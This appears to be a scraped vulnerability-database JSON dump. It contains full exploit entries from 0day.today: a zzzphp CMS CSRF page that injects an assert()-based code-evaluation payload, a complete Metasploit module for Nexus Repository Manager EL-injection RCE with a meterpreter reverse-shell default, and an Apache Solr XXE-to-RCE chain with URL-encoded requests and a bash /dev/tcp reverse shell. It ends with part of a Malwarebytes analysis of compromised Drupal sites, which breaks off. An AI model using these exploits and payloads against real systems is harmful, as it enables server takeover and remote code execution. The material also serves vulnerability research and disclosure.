["CVE-2019-9082"], "modified": "2019-03-04T00:00:00", "id": "1337DAY-ID-32303", "href": "https://0day.today/exploit/description/32303", "sourceData": "# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1\r\n# Google Dork: intext:\"2015-2019 zzcms.com\"\r\n\r\n# Date: 26/02/2019\r\n\r\n# Exploit Author: Yang Chenglong\r\n\r\n# Vendor Homepage: http://www.zzzcms.com/index.html\r\n\r\n# Software Link: http://115.29.55.18/zzzphp.zip\r\n\r\n# Version: 1.6.1\r\n\r\n# Tested on: windows/Linux,iis/apache\r\n\r\n# CVE : CVE-2019-9082\r\n\r\nDue to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.\r\n\r\nExploit:\r\n\r\n\r\n<html>\r\n\r\n\r\n\r\n <!-- CSRF PoC - generated by Burp Suite Professional -->\r\n\r\n\r\n\r\n <body>\r\n\r\n\r\n\r\n <script>history.pushState('', '', '/')</script>\r\n\r\n\r\n\r\n <form action=\"http://192.168.1.64/zzzphp/admin015/save.php?act=editfile\" method=\"POST\">\r\n\r\n\r\n\r\n <input type=\"hidden\" name=\"file\" value=\"/zzzphp/template/pc/cn2016/html/search.html\" />\r\n\r\n\r\n\r\n <input type=\"hidden\" name=\"filetext\" value=\"{if:assert($_POST[x])}phpinfo();{end if}\" />\r\n\r\n\r\n\r\n <input type=\"submit\" value=\"Submit request\" />\r\n\r\n\r\n\r\n </form>\r\n\r\n\r\n\r\n <script>\r\n\r\n\r\n\r\n document.forms[0].submit();\r\n\r\n\r\n\r\n </script>\r\n\r\n\r\n\r\n </body>\r\n\r\n\r\n\r\n</html>\r\n\r\nSave the codes above as html file and host it on a web server. 
Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.\r\n\r\nRemarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454\n\n# 0day.today [2019-03-05] #", "sourceHref": "https://0day.today/exploit/32303", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-08-02T09:23:00", "description": "This Metasploit module exploits a Java Expression Language (EL) injection in Nexus Repository Manager versions up to and including 3.21.1 to execute code as the Nexus user. Tested against 3.21.1-01.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "zdt", "title": "Nexus Repository Manager 3.21.1-01 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": 
"2020-04-16T00:00:00", "id": "1337DAY-ID-34251", "href": "https://0day.today/exploit/description/34251", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nexus Repository Manager Java EL Injection RCE',\n 'Description' => %q{\n This module exploits a Java Expression Language (EL) injection in Nexus\n Repository Manager versions up to and including 3.21.1 to execute code\n as the Nexus user. Tested against 3.21.1-01.\n },\n 'Author' => [\n 'Alvaro Mu\u00f1oz', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10199'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],\n ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']\n ],\n 'DisclosureDate' => '2020-03-31', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},\n 'CmdStagerFlavor' => %i[curl wget],\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n Opt::RPORT(8081),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Nexus username', 'admin']),\n OptString.new('PASSWORD', [true, 'Nexus password', 'admin'])\n ])\n end\n\n def post_auth?\n # Pre-auth RCE? 
https://twitter.com/iamnoooob/status/1246182773427240967\n true\n end\n\n # Send a GET / request to the server, check the response for a Server header\n # containing the Nexus version, and then check if it's a vulnerable version\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.headers['Server']\n return CheckCode::Unknown('Target did not respond with Server header.')\n end\n\n # Example Server header:\n # Server: Nexus/3.21.1-01 (OSS)\n version = res.headers['Server'].scan(%r{^Nexus/([\\d.-]+)}).flatten.first\n\n unless version\n return CheckCode::Unknown('Target did not respond with Nexus version.')\n end\n\n if Gem::Version.new(version) <= Gem::Version.new('3.21.1')\n return CheckCode::Appears(\"Nexus #{version} is a vulnerable version.\")\n end\n\n CheckCode::Safe(\"Nexus #{version} is NOT a vulnerable version.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing command stager for #{datastore['PAYLOAD']}\")\n\n # This will drop a binary payload to disk and execute it!\n execute_cmdstager(\n noconcat: true,\n cookie: login(datastore['USERNAME'], datastore['PASSWORD'])\n )\n end\n\n def login(username, password)\n print_status(\"Logging in with #{username}:#{password}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/service/rapture/session'),\n 'vars_post' => {\n 'username' => Rex::Text.encode_base64(username),\n 'password' => Rex::Text.encode_base64(password)\n },\n 'partial' => true # XXX: Return partial response despite timeout\n }, 3.5)\n\n unless res\n fail_with(Failure::Unknown, 'Target did not respond to login request')\n end\n\n cookie = res.get_cookies\n\n unless res.code == 204 && cookie.match(/NXSESSIONID=[\\h-]+/)\n fail_with(Failure::NoAccess, 'Could not log in with 
specified creds')\n end\n\n print_good(\"Logged in with #{cookie}\")\n cookie\n end\n\n # This is defined so that CmdStager can use it!\n def execute_command(cmd, opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/service/rest/beta/repositories/go/group'),\n # HACK: Bypass CSRF token with random User-Agent header\n 'agent' => rand_text_english(8..42),\n 'cookie' => opts[:cookie],\n 'ctype' => 'application/json',\n 'data' => json_payload(cmd)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Target did not respond to payload request')\n end\n\n unless res.code == 400 && res.body.match(/java\\.lang\\.UNIXProcess@\\h+/)\n fail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n # PoC based off API docs for /service/rest/beta/repositories/go/group:\n # http://localhost:8081/#admin/system/api\n def json_payload(cmd)\n {\n 'name' => 'internal',\n 'online' => true,\n 'storage' => {\n 'blobStoreName' => 'default',\n 'strictContentTypeValidation' => true\n },\n 'group' => {\n # XXX: memberNames has to be an array, but the API example was a string\n 'memberNames' => [el_payload(cmd)]\n }\n }.to_json\n end\n\n # Helpful resource from which I borrowed the EL payload:\n # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf\n def el_payload(cmd)\n # HACK: Format our EL expression nicely and then strip introduced whitespace\n el = <<~EOF.gsub(/\\s+/, '')\n ${\n \"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\n \"\".getClass().forName(\"java.lang.Runtime\")\n ).exec(\"PATCH_ME\")\n }\n EOF\n\n # Patch in our command, escaping any double quotes\n el.sub('PATCH_ME', cmd.gsub('\"', '\\\\\"'))\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34251", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T07:13:45", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "zdt", "title": "Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2017-10-18T00:00:00", "id": "1337DAY-ID-28814", "href": "https://0day.today/exploit/description/28814", "sourceData": "First Vulnerability: XML External Entity Expansion (deftype=xmlparser) \r\n \r\nLucene includes a query parser that is able to create the full spectrum of Lucene queries from an XML data structure. Starting from version 5.1, Solr supports the \"xml\" query parser in the search query.\r\n \r\nThe problem is that the Lucene XML parser does not explicitly prohibit DOCTYPE declarations and expansion of external entities. It is possible to include special entities in the XML document that point to external files (via file://) or external URLs (via http://):\r\n \r\nExample usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://xxx.s.artsploit.com/xxx\"'><a></a>'}\r\n \r\nWhen Solr parses this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition. \r\n \r\nSince the parser type can be defined in the search query, which very often comes from untrusted user input (e.g. search fields on websites), 
this allows an external attacker to make arbitrary HTTP requests to the local Solr instance and to bypass all firewall restrictions.\r\n \r\nFor example, this vulnerability could be used to send malicious data to the '/upload' handler:\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={\"xx\":\"yy\"}&commit=true\"'><a></a>'}\r\n \r\nThis vulnerability can also be exploited as blind XXE using the ftp wrapper in order to read arbitrary local files from the Solr server.\r\n \r\nVulnerable code location:\r\n/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java\r\n \r\nstatic Document parseXML(InputStream pXmlFile) throws ParserException {\r\n DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\r\n DocumentBuilder db = null;\r\n try {\r\n db = dbf.newDocumentBuilder();\r\n }\r\n catch (Exception se) {\r\n throw new ParserException(\"XML Parser configuration error\", se);\r\n }\r\n org.w3c.dom.Document doc = null;\r\n try {\r\n doc = db.parse(pXmlFile);\r\n }\r\n \r\n \r\nSteps to reproduce:\r\n \r\n1. Set up a listener on any port using the netcat command \"nc -lv 4444\"\r\n2. Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:4444/executed\"><a></a>'}\r\n3. You will see a request from the Solr server on your netcat listener. 
It proves that the DOCTYPE declaration is resolved.\r\n \r\n \r\nRemediation suggestions:\r\n \r\nConsider adding the following lines to /solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:\r\n \r\nstatic Document parseXML(InputStream pXmlFile) throws ParserException {\r\n DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\r\n DocumentBuilder db = null;\r\n try {\r\n //protect from XXE attacks\r\n dbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\r\n dbf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\r\n dbf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\r\n \r\n db = dbf.newDocumentBuilder();\r\n }\r\n catch (Exception se) {\r\n throw new ParserException(\"XML Parser configuration error\", se);\r\n }\r\n org.w3c.dom.Document doc = null;\r\n try {\r\n doc = db.parse(pXmlFile);\r\n }\r\n \r\nLinks:\r\nhttps://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing\r\nhttps://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet\r\n \r\nCVSS v2 base score: 9.0\r\n(AV:N/AC:L/Au:N/C:C/I:P/A:P)\r\n \r\nSecond Vulnerability: Remote Code Execution (add-listener: RunExecutableListener)\r\n \r\nSolr \"RunExecutableListener\" class can be used to execute arbitrary commands on specific events, for example after each update query. 
The problem is that such a listener can be enabled with arbitrary parameters simply by using the Config API with the add-listener command.\r\n \r\nPOST /solr/newcollection/config HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 198\r\n \r\n{\r\n \"add-listener\" : {\r\n \"event\":\"postCommit\",\r\n \"name\":\"newlistener\",\r\n \"class\":\"solr.RunExecutableListener\",\r\n \"exe\":\"ANYCOMMAND\",\r\n \"dir\":\"/usr/bin/\",\r\n \"args\":[\"ANYARGS\"]\r\n }\r\n}\r\n \r\nThe parameters \"exe\", \"args\" and \"dir\" can be crafted through the HTTP request that modifies the collection's config. This means that anybody who can send an HTTP request to the Solr API is able to execute arbitrary shell commands when the \"postCommit\" event is fired, which amounts to remote code execution for a remote attacker.\r\n \r\nSteps to reproduce:\r\n \r\nStep 1. Create a new collection:\r\n \r\nhttp://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2\r\n \r\nStep 2. Set up a listener on any port using the netcat command \"nc -lv 4444\"\r\n \r\nStep 3. Add a new RunExecutableListener for the collection, where the \"exe\" attribute contains the name of the command to run (\"/usr/bin/curl\") and the \"args\" attribute contains the value \"http://localhost:4444/executed\", so that a request is made to the attacker's netcat listener:\r\n \r\nPOST /solr/newcollection/config HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 198\r\n \r\n{\r\n \"add-listener\" : {\r\n \"event\":\"postCommit\",\r\n \"name\":\"newlistener\",\r\n \"class\":\"solr.RunExecutableListener\",\r\n \"exe\":\"curl\",\r\n \"dir\":\"/usr/bin/\",\r\n \"args\":[\"http://localhost:4444/executed\"]\r\n }\r\n}\r\n \r\nStep 4. 
Update \"newcollection\" to trigger execution of RunExecutableListener: \r\n \r\nPOST /solr/newcollection/update HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 19\r\n \r\n[{\"id\":\"test\"}]\r\n \r\nStep 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.\r\n \r\n \r\nCVSS v2 base score: 10.0\r\n(AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n \r\nSummary:\r\n \r\nBy chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker should be able to specify a part of query that comes to \"q\"\r\nsearch parameter (which is a case for many web applications who use solr).\r\n \r\nLets say that we have an attacker who can only send search queries (\"q\" param) to a \"/select\" solr endpoint.\r\nHere is the complete exploit scenario:\r\n \r\nStep 1. Create New collection via XXE. This step may be skipped if the attacker already knows any collection name.\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2\"><a></a>'}\r\n \r\nStep 2. Set up a netcat listener \"nc -lv 4444\"\r\n \r\nStep 3. 
Add a new RunExecutableListener listener via XXE\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35
%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM 
\"http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={\"add-listener\":{\"event\":\"postCommit\",\"name\":\"newlistener\",\"class\":\"solr.RunExecutableListener\",\"exe\":\"sh\",\"dir\":\"/bin/\",\"args\":[\"-c\",\"[email\u00a0protected]|sh\",\".\",\"echo\",\"/bin/bash\",\"-i\",\">&\",\"/dev/tcp/127.0.0.1/1234\",\"0>&1\"]}}&shards=localhost:8983/\"><a></a>'}\r\n \r\nAs you may notice, in order to update the config we need to send a POST request to the application, but through the XXE vulnerability we can only send HTTP GET requests. A special trick is used here: if Solr receives a \"/select?q=123&qt=/xxx&shards=localhost:8983/\" GET request, it converts it to a POST and forwards that request to the shard specified in the \"shards\" parameter. It also overwrites the request path with the \"qt\" parameter, so we can turn \"/select\" into \"/config\". \r\nThe resulting HTTP request that lands on localhost:8983/ will be a POST request with stream.body=\"our_value\". That is exactly what we need in terms of exploitation.\r\n \r\nStep 3. 
Update \"newcollection\" through XXE to trigger execution of RunExecutableListener\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:8983/solr/newcollection/update?stream.body=[{\"id\":\"AAA\"}]&commit=true&overwrite=true\"><a></a>'} \r\n \r\nStep 5. When the \"/bin/sh c [email\u00a0protected]|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1\" command is executed during the update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.\r\n \r\n \r\nIn all three requests Solr responds with different errors, but all of these errors occur after the desired actions have been executed.\r\n \r\nAll these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt)\r\n \r\nThese vulnerabilities were discovered by:\r\nMichael Stepankin (JPMorgan Chase)\r\nOlga Barinova (Gotham Digital Science)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28814", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. 
In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proofs of concept that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full backup and test the changes in a staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur, due to lack of knowledge, fear of breaking something, and, of course, costs. While it is each site owner's responsibility to do due diligence with their web properties, the outcome is typically websites that are severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number of web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites early in the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. 
The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. 
But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went through the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer or Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages are a typical approach for tech support scams. 
